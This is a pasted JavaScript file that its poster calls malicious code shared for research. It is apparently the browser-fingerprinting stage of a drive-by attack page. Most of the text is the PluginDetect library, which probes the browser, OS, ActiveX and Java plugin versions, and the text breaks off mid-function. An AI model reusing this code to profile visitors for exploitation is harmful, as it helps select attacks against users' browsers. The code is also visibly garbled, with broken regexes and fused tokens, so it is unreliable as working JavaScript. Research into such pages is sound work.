// may God have mercy enough to those who coded & spread the below evilness // This is for the research purpose only, pasted by the citizen who cares document.write('

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'); function end_redirect(){ } try { var PluginDetect = { version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){ return function (){ c(b, a) } } , isDefined : function (b){ return typeof b != "undefined" } , isArray : function (b){ return (/array/i).test(Object.prototype.toString.call(b)) } , isFunc : function (b){ return typeof b == "function" } , isString : function (b){ return typeof b == "string" } , isNum : function (b){ return typeof b == "number" } , isStrNum : function (b){ return (typeof b == "string" && (/\d/).test(b)) } , getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g, getNum : function (b, c){ var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx). exec(b) : null; return a ? a[0] : null } , compareNums : function (h, f, d){ var e = this , c, b, a, g = parseInt; if (e.isStrNum(h) && e.isStrNum(f)){ if (e.isDefined(d) && d.compareNums){ return d.compareNums(h, f) } c = h.split(e.splitNumRegx); b = f.split(e.splitNumRegx); for (a = 0; a < Math.min(c.length, b.length); a ++ ){ if (g(c[a], 10) > g(b[a], 10)){ return 1 } if (g(c[a], 10) < g(b[a], 10)){ return - 1 } } } return 0 } , formatNum : function (b, c){ var d = this , a, e; if (!d.isStrNum(b)){ return null } if (!d.isNum(c)){ c = 4 } c--; e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]); for (a = 0; a < 4; a ++ ){ if (/^(0+)(.+)$/.test(e[a])){ e[a] = RegExp.$2 } if (a > c ||! (/\d/).test(e[a])){ e[a] = "0" } } return e.slice(0, 4).join(",") } , $$hasMimeType : function (a){ return function (c){ if (!a.isIE && c){ var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []); for (b = 0; b < d.length; b ++ ){ if (a.isString(d[b]) &&/ [ ^\ s] / .test(d[b])){ f = navigator.mimeTypes[d[b]]; e = f ? f.enabledPlugin : 0; if (e && (e.name || e.description)){ return f } } } } return null } } , findNavPlugin : function (l, e, c){ var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ?/\ d /: 0, k = c ? new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m; for (f = 0; f < a.length; f ++ ){ m = a[f].description || g; b = a[f].name || g; if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h. test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){ if (!k ||! (k.test(m) || k.test(b))){ return a[f] } } } return null } , getMimeEnabledPlugin : function (k, m, c){ var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a, l, d, j = e.isString(k) ? [k] : k; for (d = 0; d < j.length; d ++ ){ if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){ l = f.description || h; a = f.name || h; if (b.test(l) || b.test(a)){ if (!g ||! (g.test(l) || g.test(a))){ return f } } } } return 0 } , getPluginFileVersion : function (f, b){ var h = this , e, d, g, a, c =- 1; if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){ return b } if (!b){ return e } e = h.formatNum(e); b = h.formatNum(b); d = b.split(h.splitNumRegx); g = e.split(h.splitNumRegx); for (a = 0; a < d.length; a ++ ){ if (c >- 1 && a > c && d[a] != "0"){ return b } if (g[a] != d[a]){ if (c ==- 1){ c = a } if (d[a] != "0"){ return b } } } return e } , AXO : window.ActiveXObject, getAXO : function (a){ var f = null, d, b = this , c = { } ; try { f = new b.AXO(a) } catch (d){ } return f } , convertFuncs : function (f){ var a, g, d, b =/^ [ \ $][ \ $] /, c = this ; for (ain f){ if (b.test(a)){ try { g = a.slice(2); if (g.length > 0 &&! f[g]){ f[g] = f[a](f); deletef[a] } } catch (d){ } } } } , initObj : function (e, b, d){ var a, c; if (e){ if (e[b[0]] == 1 || d){ for (a = 0; a < b.length; a = a + 2){ e[b[a]] = b[a + 1] } } for (ain e){ c = e[a]; if (c && c[b[0]] == 1){ this .initObj(c, b) } } } } , initScript : function (){ var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "", b = a.platform || "", h = a.product || ""; c.initObj(c, ["$", c]); for (fin c.Plugins){ if (c.Plugins[f]){ c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1) } } ; c.OS = 100; if (b){ var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "" , 100]; for (f = d.length - 2; f >= 0; f = f - 2){ if (d[f] && new RegExp(d[f], "i").test(b)){ c.OS = d[f + 1]; break } } } c.convertFuncs(c); c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName( "body")[0] || document.body || null); c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))(); c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null ; c.ActiveXEnabled = false; if (c.isIE){ var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"]; for (f = 0; f < j.length; f ++ ){ if (c.getAXO(j[f])){ c.ActiveXEnabled = true; break } } } c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i); c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null; c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i); c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null; c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && ( /Safari\s*\/\s*(\d[\d\.]*)/i).test(i); c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum( RegExp.$1) : null; c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i); c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null; c.addWinEvent("load", c.handler(c.runWLfuncs, c)) } , init : function (d){ var c = this , b, d, a = { status :- 3, plugin : 0 } ; if (!c.isString(d)){ return a } if (d.length == 1){ c.getVersionDelimiter = d; return a } d = d.toLowerCase().replace(/\s/g, ""); b = c.Plugins[d]; if (!b ||! b.getVersion){ return a } a.plugin = b; if (!c.isDefined(b.installed)){ b.installed = null; b.version = null; b.version0 = null; b.getVersionDone = null; b.pluginName = d } c.garbage = false; if (c.isIE &&! c.ActiveXEnabled && d !== "java"){ a.status =- 2; return a } a.status = 1; return a } , fPush : function (b, a){ var c = this ; if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0 ])))){ a.push(b) } } , callArray : function (b){ var c = this , a; if (c.isArray(b)){ for (a = 0; a < b.length; a ++ ){ if (b[a] === null){ return } c.call(b[a]); b[a] = null } } } , call : function (c){ var b = this , a = b.isArray(c) ? c.length :- 1; if (a > 0 && b.isFunc(c[0])){ c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0) } else { if (b.isFunc(c)){ c(b) } } } , getVersionDelimiter : ",", $$getVersion : function (a){ return function (g, d, c){ var e = a.init(g), f, b, h = { } ; if (e.status < 0){ return null } ; f = e.plugin; if (f.getVersionDone != 1){ f.getVersion(null, d, c); if (f.getVersionDone === null){ f.getVersionDone = 1 } } a.cleanup(); b = (f.version || f.version0); b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b; return b } } , cleanup : function (){ var a = this ; if (a.garbage && a.isDefined(window.CollectGarbage)){ window.CollectGarbage() } } , addWinEvent : function (d, c){ var e = this , a = window, b; if (e.isFunc(c)){ if (a.addEventListener){ a.addEventListener(d, c, false) } else { if (a.attachEvent){ a.attachEvent("on" + d, c) } else { b = a["on" + d]; a["on" + d] = e.winHandler(c, b) } } } } , winHandler : function (d, c){ return function (){ d(); if (typeof c == "function"){ c() } } } , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){ var b = { } ; a.winLoaded = true; a.callArray(a.WLfuncs0); a.callArray(a.WLfuncs); if (a.onDoneEmptyDiv){ a.onDoneEmptyDiv() } } , winLoaded : false, $$onWindowLoaded : function (a){ return function (b){ if (a.winLoaded){ a.call(b) } else { a.fPush(b, a.WLfuncs) } } } , $$onDetectionDone : function (a){ return function (h, g, c, b){ var d = a.init(h), k, e, j = { } ; if (d.status ==- 3){ return - 1 } e = d.plugin; if (!a.isArray(e.funcs)){ e.funcs = [] } if (e.getVersionDone != 1){ k = a.isMinVersion ? a.isMinVersion(h, "0", c, b) : a.getVersion(h, c, b) } if (e.installed !=- 0.5 && e.installed != 0.5){ a.call(g); return 1 } if (e.NOTF){ a.fPush(g, e.funcs); return 0 } return 1 } } , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv : function (){ var d = this , b, h, c, a, f, g; if (d.div && d.div.childNodes){ for (b = d.div.childNodes.length - 1; b >= 0; b -- ){ c = d.div.childNodes[b]; if (c && c.childNodes){ for (h = c.childNodes.length - 1; h >= 0; h -- ){ g = c.childNodes[h]; try { c.removeChild(g) } catch (f){ } } } if (c){ try { d.div.removeChild(c) } catch (f){ } } } } if (!d.div){ a = document.getElementById(d.divID); if (a){ d.div = a } } if (d.div && d.div.parentNode){ try { d.div.parentNode.removeChild(d.div) } catch (f){ } d.div = null } } , DONEfuncs : [], onDoneEmptyDiv : function (){ var c = this , a, b; if (!c.winLoaded){ return } if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){ return } for (ain c){ b = c[a]; if (b && b.funcs){ if (b.OTF == 3){ return } if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){ return } } } for (a = 0; a < c.DONEfuncs.length; a ++ ){ c.callArray(c.DONEfuncs) } c.emptyDiv() } , getWidth : function (c){ if (c){ var a = c.scrollWidth || c.offsetWidth, b = this ; if (b.isNum(a)){ return a } } return - 1 } , getTagStatus : function (m, g, a, b){ var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d = g.span, i = c.getWidth(d); if (!k ||! h ||! d ||! c.getDOMobj(m)){ return - 2 } if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){ return 0 } if (l >= i){ return - 1 } try { if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){ if (!m.winLoaded && c.winLoaded){ return 1 } if (m.winLoaded && c.isNum(b)){ if (!c.isNum(m.count)){ m.count = b } if (b - m.count >= 10){ return 1 } } } } catch (f){ } return 0 } , getDOMobj : function (g, a){ var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0; try { if (b && a){ d.div.focus() } } catch (f){ } return b ? c.firstChild : null } , setStyle : function (b, g){ var f = b.style, a, d, c = this ; if (f && g){ for (a = 0; a < g.length; a = a + 2){ try { f[g[a]] = g[a + 1] } catch (d){ } } } } , insertDivInBody : function (a, i){ var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window. document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body); if (!g){ try { j.write(c + 'div id="' + b + '">o' + c + "/div>"); d = j.getElementById(b) } catch (h){ } } g = (j.getElementsByTagName("body")[0] || j.body); if (g){ if (g.firstChild && f.isDefined(g.insertBefore)){ g.insertBefore(a, g.firstChild) } else { g.appendChild(a) } if (d){ g.removeChild(d) } } else { } } , insertHTML : function (g, b, h, a, l){ var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<"; var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"]; var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;"; if (!k.isDefined(a)){ a = "" } if (k.isString(g) && (/[^\s]/).test(g)){ g = g.toLowerCase().replace(/\s/g, ""); q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" '; q += 'style="' + i + 'display:inline;" '; for (o = 0; o < b.length; o = o + 2){ if (/[^\s]/.test(b[o + 1])){ q += b[o] + '="' + b[o + 1] + '" ' } } q += ">"; for (o = 0; o < h.length; o = o + 2){ if (/[^\s]/.test(h[o + 1])){ q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />' } } q += a + f + "/" + g + ">" } else { q = a } if (!k.div){ j = n.getElementById(k.divID); if (j){ k.div = j } else { k.div = n.createElement("div"); k.div.id = k.divID } k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"])); if (!j){ k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]); k.insertDivInBody(k.div) } } if (k.div && k.div.parentNode){ k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k. pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"])); try { p.innerHTML = q } catch (m){ } ; try { k.div.appendChild(p) } catch (m){ } ; return { span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q } } return { span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q } } , file : { $ : 1, any : "fileStorageAny999", valid : "fileStorageValid999", save : function (d, f, c){ var b = this , e = b.$, a; if (d && e.isDefined(c)){ if (!d[b.any]){ d[b.any] = [] } if (!d[b.valid]){ d[b.valid] = [] } d[b.any].push(c); a = b.split(f, c); if (a){ d[b.valid].push(a) } } } , getValidLength : function (a){ return a && a[this .valid] ? a[this .valid].length : 0 } , getAnyLength : function (a){ return a && a[this .any] ? a[this .any].length : 0 } , getValid : function (c, a){ var b = this ; return c && c[b.valid] ? b.get(c[b.valid], a) : null } , getAny : function (c, a){ var b = this ; return c && c[b.any] ? b.get(c[b.any], a) : null } , get : function (d, a){ var c = d.length - 1, b = this .$.isNum(a) ? a : c; return (b < 0 || b > c) ? null : d[b] } , split : function (g, c){ var b = this , e = b.$, f = null, a, d; g = g ? g.replace(".", "\\.") : ""; d = new RegExp("^(.*[^\\/])(" + g + "\\s*)$"); if (e.isString(c) && d.test(c)){ a = (RegExp.$1).split("/"); f = { name : a[a.length - 1], ext : RegExp.$2, full : c } ; a[a.length - 1] = ""; f.path = a.join("/") } return f } , z : 0 } , Plugins : { java : { mimeType : ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"], classID : "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" , navigator : { a : window.navigator.javaEnabled(), javaEnabled : function (){ return this .a } , mimeObj : 0, pluginObj : 0 } , OTF : null, minIEver : 7, debug : 0, debugEnable : function (){ var a = this , b = a.$; a.debug = 1 } , isDisabled : { $ : 1, DTK : function (){ var a = this , c = a.$, b = a.$$; if ((c.isGecko && c.compareNums(c.verGecko, c.formatNum("1.6")) <= 0) || (c. isSafari && c.OS == 1 && (!c.verSafari || c.compareNums(c.verSafari, "5,1,0,0" ) < 0)) || c.isChrome || (c.isIE &&! c.ActiveXEnabled)){ return 1 } return 0 } , AXO : function (){ var a = this , c = a.$, b = a.$$; return (!c.isIE ||! c.ActiveXEnabled || (!b.debug && b.DTK.query().status !== 0)) } , navMime : function (){ var b = this , d = b.$, c = b.$$, a = c.navigator; if (d.isIE ||! a.mimeObj ||! a.pluginObj){ return 1 } return 0 } , navPlugin : function (){ var b = this , d = b.$, c = b.$$, a = c.navigator; if (d.isIE ||! a.mimeObj ||! a.pluginObj){ return 1 } return 0 } , windowDotJava : function (){ var a = this , c = a.$, b = a.$$; if (!window.java){ return 1 } if (c.OS == 2 && c.verOpera && c.verOpera < 9.2 && c.verOpera >= 9){ return 1 } if (c.verGecko && c.compareNums(c.verGecko, "1,9,0,0") < 0 && c.compareNums(c. verGecko, "1,8,0,0") >= 0){ return 1 } return 0 } , allApplets : function (){ var b = this , d = b.$, c = b.$$, a = c.navigator; if (d.OS >= 20){ return 0 } if (d.verOpera && d.verOpera < 11 &&! a.javaEnabled() &&! c.lang.System. getProperty()[0]){ return 1 } if ((d.verGecko && d.compareNums(d.verGecko, d.formatNum("2")) < 0) &&! a. mimeObj &&! c.lang.System.getProperty()[0]){ return 1 } return 0 } , AppletTag : function (){ var b = this , d = b.$, c = b.$$, a = c.navigator; return d.isIE ?! a.javaEnabled() : 0 } , ObjectTag : function (){ var a = this , c = a.$, b = a.$$; return c.isIE ?! c.ActiveXEnabled : 0 } , z : 0 } , getVerifyTagsDefault : function (){ var a = this , c = a.$, b = [1, 0, 1]; if (c.OS >= 20){ return b } if ((c.isIE && (c.verIE < 9 ||! c.ActiveXEnabled)) || (c.verGecko && c. compareNums(c.verGecko, c.formatNum("2")) < 0) || (c.isSafari && (!c.verSafari || c.compareNums(c.verSafari, c.formatNum("4")) < 0)) || (c.verOpera && c.verOpera < 10)){ b = [1, 1, 1] } return b } , getVersion : function (j, g, i){ var b = this , d = b.$, e, a = b.applet, h = b.verify, k = b.navigator, f = null , l = null, c = null; if (b.getVersionDone === null){ b.OTF = 0; k.mimeObj = d.hasMimeType(b.mimeType); if (k.mimeObj){ k.pluginObj = k.mimeObj.enabledPlugin } if (h){ h.begin() } } a.setVerifyTagsArray(i); d.file.save(b, ".jar", g); if (b.getVersionDone === 0){ if (a.should_Insert_Query_Any()){ e = a.insert_Query_Any(); b.setPluginStatus(e[0], e[1], f) } return } if ((!f || b.debug) && b.DTK.query().version){ f = b.DTK.version } if ((!f || b.debug) && b.navMime.query().version){ f = b.navMime.version } if ((!f || b.debug) && b.navPlugin.query().version){ f = b.navPlugin.version } if ((!f || b.debug) && b.AXO.query().version){ f = b.AXO.version } if (b.nonAppletDetectionOk(f)){ c = f } if (!c || b.debug || a.VerifyTagsHas(2.2) || a.VerifyTagsHas(2.5)){ e = b.lang.System.getProperty(); if (e[0]){ f = e[0]; c = e[0]; l = e[1] } } b.setPluginStatus(c, l, f); if (a.should_Insert_Query_Any()){ e = a.insert_Query_Any(); if (e[0]){ c = e[0]; l = e[1] } } b.setPluginStatus(c, l, f) } , nonAppletDetectionOk : function (b){ var d = this , e = d.$, a = d.navigator, c = 1; if (!b || (!a.javaEnabled() &&! d.lang.System.getPropertyHas(b)) || (!e.isIE &&! a.mimeObj &&! d.lang.System.getPropertyHas(b)) || (e.isIE &&! e.ActiveXEnabled )){ c = 0 } else { if (e.OS >= 20){ } else { if (d.info && d.info.getPlugin2Status() < 0 && d.info.BrowserRequiresPlugin2 ()){ c = 0 } } } return c } , setPluginStatus : function (d, f, a){ var c = this , e = c.$, b; a = a || c.version0; if (c.OTF > 0){ d = d || c.lang.System.getProperty()[0] } if (c.OTF < 3){ b = d ? 1 : (a ?- 0.2 :- 1); if (c.installed === null || b > c.installed){ c.installed = b } } if (c.OTF == 2 && c.NOTF &&! c.applet.getResult()[0] &&! c.lang.System. getProperty()[0]){ c.installed = a ?- 0.2 :- 1 } ; if (c.OTF == 3 && c.installed !=- 0.5 && c.installed != 0.5){ c.installed = (c.NOTF.isJavaActive(1) == 1 || c.lang.System.getProperty()[0]) ? 0.5 :- 0.5 } if (c.OTF == 4 && (c.installed ==- 0.5 || c.installed == 0.5)){ if (d){ c.installed = 1 } else { if (c.NOTF.isJavaActive(1) == 1){ if (a){ c.installed = 1; d = a } else { c.installed = 0 } } else { if (a){ c.installed =- 0.2 } else { c.installed =- 1 } } } } ; if (a){ c.version0 = e.formatNum(e.getNum(a)) } if (d){ c.version = e.formatNum(e.getNum(d)) } if (f && e.isString(f)){ c.vendor = f } if (!c.vendor){ c.vendor = "" } if (c.verify && c.verify.isEnabled()){ c.getVersionDone = 0 } else { if (c.getVersionDone != 1){ if (c.OTF < 2){ c.getVersionDone = 0 } else { c.getVersionDone = c.applet.can_Insert_Query_Any() ? 0 : 1 } } } } , DTK : { $ : 1, hasRun : 0, status : null, VERSIONS : [], version : "", HTML : null, Plugin2Status : null, classID : ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"], mimeType : [ "application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"], disabled : function (){ return this .$$.isDisabled.DTK() } , query : function (){ var k = this , g = k.$, d = k.$$, j, l, h, m = { } , f = { } , a, c = null, i = null, b = (k.hasRun || k.disabled()); k.hasRun = 1; if (b){ return k } k.status = 0; if (g.isIE && g.verIE >= 6){ for (l = 0; l < k.classID.length; l ++ ){ k.HTML = g.insertHTML("object", ["classid", k.classID[l]], []); c = g.getDOMobj(k.HTML); try { if (c && c.jvms){ break } } catch (j){ } } } else { if (!g.isIE && (h = g.hasMimeType(k.mimeType)) && h.type){ k.HTML = g.insertHTML("object", ["type", h.type], []); c = g.getDOMobj(k.HTML) } } if (c){ try { a = c.jvms; if (a){ i = a.getLength(); if (g.isNum(i)){ k.status = i > 0 ? 1 :- 1; for (l = 0; l < i; l ++ ){ h = g.getNum(a.get(i - 1 - l).version); if (h){ k.VERSIONS.push(h); f["a" + g.formatNum(h)] = 1 } } } } } catch (j){ } } h = 0; for (lin f){ h ++ } if (h && h !== k.VERSIONS.length){ k.VERSIONS = [] } if (k.VERSIONS.length){ k.version = g.formatNum(k.VERSIONS[0]) } ; return k } } , AXO : { $ : 1, hasRun : 0, VERSIONS : [], version : "", disabled : function (){ return this .$$.isDisabled.AXO() } , JavaVersions : [[1, 9, 1, 40], [1, 8, 1, 40], [1, 7, 1, 40], [1, 6, 0, 40], [1 , 5, 0, 30], [1, 4, 2, 30], [1, 3, 1, 30]], query : function (){ var a = this , e = a.$, b = a.$$, c = (a.hasRun || a.disabled()); a.hasRun = 1; if (c){ return a } var i = [], k = [1, 5, 0, 14], j = [1, 6, 0, 2], h = [1, 3, 1, 0], g = [1, 4, 2, 0], f = [1, 5, 0, 7], d = b.getInfo ? true : false, l = { } ; if (e.verIE >= b.minIEver){ i = a.search(j, j, d); if (i.length > 0 && d){ i = a.search(k, k, d) } } else { if (d){ i = a.search(f, f, true) } if (i.length == 0){ i = a.search(h, g, false) } } if (i.length){ a.version = i[0]; a.VERSIONS = [].concat(i) } ; return a } , search : function (a, j, p){ var h, d, f = this , e = f.$, k = f.$$, n, c, l, q, b, o, r, i = []; if (e.compareNums(a.join(","), j.join(",")) > 0){ j = a } j = e.formatNum(j.join(",")); var m, s = "1,4,2,0", g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" + (a[3] > 0 ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : ""); for (h = 0; h < f.JavaVersions.length; h ++ ){ d = f.JavaVersions[h]; n = "JavaPlugin." + d[0] + "" + d[1]; b = d[0] + "." + d[1] + "."; for (l = d[2]; l >= 0; l -- ){ r = "JavaWebStart.isInstalled." + b + l + ".0"; if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 &&! e.getAXO (r)){ continue } m = e.compareNums(d[0] + "," + d[1] + "," + l + ",0", s) < 0 ? true : false ; for (q = d[3]; q >= 0; q -- ){ c = l + "_" + (q < 10 ? "0" + q : q); o = n + c; if (e.getAXO(o) && (m || e.getAXO(r))){ i.push(b + c); if (!p){ return i } } if (o == g){ return i } } if (e.getAXO(n + l) && (m || e.getAXO(r))){ i.push(b + l); if (!p){ return i } } if (n + l == g){ return i } } } return i } } , navMime : { $ : 1, hasRun : 0, mimetype : "", version : "", length : 0, mimeObj : 0, pluginObj : 0, disabled : function (){ return this .$$.isDisabled.navMime() } , query : function (){ var i = this , f = i.$, a = i.$$, b = (i.hasRun || i.disabled()); i.hasRun = 1; if (b){ return i } ; var n =/^\ s * application \/ x - java - applet; jpi - version \ s *=\ s * ( \ d. * )$ / i, g, l, j, d = "", h = "a", o, m, k = { } , c = f.formatNum("0"); for (l = 0; l < navigator.mimeTypes.length; l ++ ){ o = navigator.mimeTypes[l]; m = o ? o.enabledPlugin : 0; g = o && n.test(o.type || d) ? f.formatNum(f.getNum(RegExp.$1)) : 0; if (g && m && (m.description || m.name)){ if (!k[h + g]){ i.length ++ } k[h + g] = o.type; if (f.compareNums(g, c) > 0){ c = g } } } g = k[h + c]; if (g){ o = f.hasMimeType(g); i.mimeObj = o; i.pluginObj = o ? o.enabledPlugin : 0; i.mimetype = g; i.version = c } ; return i } } , navPlugin : { $ : 1, hasRun : 0, version : "", disabled : function (){ return this .$$.isDisabled.navPlugin() } , query : function (){ var m = this , e = m.$, c = m.$$, h = c.navigator, j, l, k, g, d, a, i, f = 0, b = (m.hasRun || m.disabled()); m.hasRun = 1; if (b){ return m } ; a = h.pluginObj.name || ""; i = h.pluginObj.description || ""; if (!f || c.debug){ g =/ Java. * TM. * Platform[ ^\ d] * ( \ d + )( ?: [ \ ., _]( \ d * )) ? ( ?:\ s * [Update] +\ s * ( \ d * )) ?/ i; if ((g.test(a) || g.test(i)) && parseInt(RegExp.$1, 10) >= 5){ f = "1," + RegExp.$1 + "," + (RegExp.$2 ? RegExp.$2 : "0") + "," + (RegExp .$3 ? RegExp.$3 : "0") } } if (!f || c.debug){ g =/ Java[ ^\ d] * Plug - in / i; l = g.test(i) ? e.formatNum(e.getNum(i)) : 0; k = g.test(a) ? e.formatNum(e.getNum(a)) : 0; if (l && (e.compareNums(l, e.formatNum("1,3")) < 0 || e.compareNums(l, e. formatNum("2")) >= 0)){ l = 0 } if (k && (e.compareNums(k, e.formatNum("1,3")) < 0 || e.compareNums(k, e. formatNum("2")) >= 0)){ k = 0 } d = l && k ? (e.compareNums(l, k) > 0 ? l : k) : (l || k); if (d){ f = d } } if (!f && e.isSafari && e.OS == 2){ j = e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa", 0); if (j){ l = e.getNum(j.description); if (l){ f = l } } } ; if (f){ m.version = e.formatNum(f) } ; return m } } , lang : { $ : 1, System : { $ : 1, hasRun : 0, result : [null, null], disabled : function (){ return this .$$.isDisabled.windowDotJava() } , getPropertyHas : function (a){ var b = this , d = b.$, c = b.getProperty()[0]; return (a && c && d.compareNums(d.formatNum(a), d.formatNum(c)) === 0) ? 1 : 0 } , getProperty : function (){ var f = this , g = f.$, d = f.$$, i, h = { } , b = (f.hasRun || f.disabled()); f.hasRun = 1; if (!b){ var a = "java_qqq990"; g[a] = null; try { var c = document.createElement("script"); c.type = "text/javascript"; c.appendChild(document.createTextNode( "(function(){var e;try{if (window.java && window.java.lang && window.java.lang.System){" + g.name + "." + a + ' =[window.java.lang.System.getProperty("java.version")+" ",window.java.lang.System.getPrope rty("java.vendor")+" "]}}catch(e){}})();')); if (g.head.firstChild){ g.head.insertBefore(c, g.head.firstChild) } else { g.head.appendChild(c) } g.head.removeChild(c) } catch (i){ } if (g[a] && g.isArray(g[a])){ f.result = [].concat(g[a]) } } return f.result } } } , applet : { $ : 1, results : [[null, null], [null, null], [null, null]], getResult : function (){ var c = this .results, a, b = []; for (a = 0; a < c.length; a ++ ){ b = c[a]; if (b[0]){ break } } return [].concat(b) } , HTML : [0, 0, 0], active : [0, 0, 0], DummyObjTagHTML : 0, DummySpanTagHTML : 0, allowed : [1, 1, 1], VerifyTagsHas : function (c){ var d = this , b; for (b = 0; b < d.allowed.length; b ++ ){ if (d.allowed[b] === c){ return 1 } } return 0 } , saveAsVerifyTagsArray : function (c){ var b = this , d = b.$, a; if (d.isArray(c)){ for (a = 0; a < b.allowed.length; a ++ ){ if (d.isNum(c[a])){ if (c[a] < 0){ c[a] = 0 } if (c[a] > 3){ c[a] = 3 } b.allowed[a] = c[a] } } } } , setVerifyTagsArray : function (d){ var b = this , c = b.$, a = b.$$; if (a.getVersionDone === null){ b.saveAsVerifyTagsArray(a.getVerifyTagsDefault()) } if (a.debug || (a.verify && a.verify.isEnabled())){ b.saveAsVerifyTagsArray([3, 3, 3]) } else { if (d){ b.saveAsVerifyTagsArray(d) } } } , allDisabled : function (){ return this .$$.isDisabled.allApplets() } , isDisabled : function (d){ var b = this , c = b.$, a = b.$$; if (d == 2 &&! c.isIE){ return 1 } if (d === 0 || d == 2){ return a.isDisabled.ObjectTag() } if (d == 1){ return a.isDisabled.AppletTag() } } , can_Insert_Query : function (b){ var a = this ; if (a.HTML[b]){ return 0 } return !a.isDisabled(b) } , can_Insert_Query_Any : function (){ var b = this , a; for (a = 0; a < b.results.length; a ++ ){ if (b.can_Insert_Query(a)){ return 1 } } return 0 } , should_Insert_Query : function (d){ var b = this , e = b.allowed, c = b.$, a = b.$$; if (!b.can_Insert_Query(d)){ return 0 } if (e[d] == 3){ return 1 } if (e[d] == 2.8 &&! b.getResult()[0]){ return 1 } if (e[d] == 2.5 &&! a.lang.System.getProperty()[0]){ return 1 } if (e[d] == 2.2 &&! a.lang.System.getProperty()[0] &&! b.getResult()[0]){ return 1 } if (!a.nonAppletDetectionOk(a.version0)){ if (e[d] == 2){ return 1 } if (e[d] == 1 &&! b.getResult()[0]){ return 1 } } return 0 } , should_Insert_Query_Any : function (){ var b = this , a; for (a = 0; a < b.allowed.length; a ++ ){ if (b.should_Insert_Query(a)){ return 1 } } return 0 } , query : function (f){ var h, a = this , g = a.$, d = a.$$, i = null, j = null, b = a.results, c; if ((b[f][0] && b[f][1]) || (d.debug && d.OTF < 3)){ return } c = g.getDOMobj(a.HTML[f], true); if (c){ try { i = g.getNum(c.getVersion() + " "); j = c.getVendor() + " "; c.statusbar(g.winLoaded ? " " : " ") } catch (h){ } if (i && g.isStrNum(i)){ b[f] = [i, j] } else { } ; try { if (g.isIE && i && c.readyState != 4){ g.garbage = true; c.parentNode.removeChild(c) 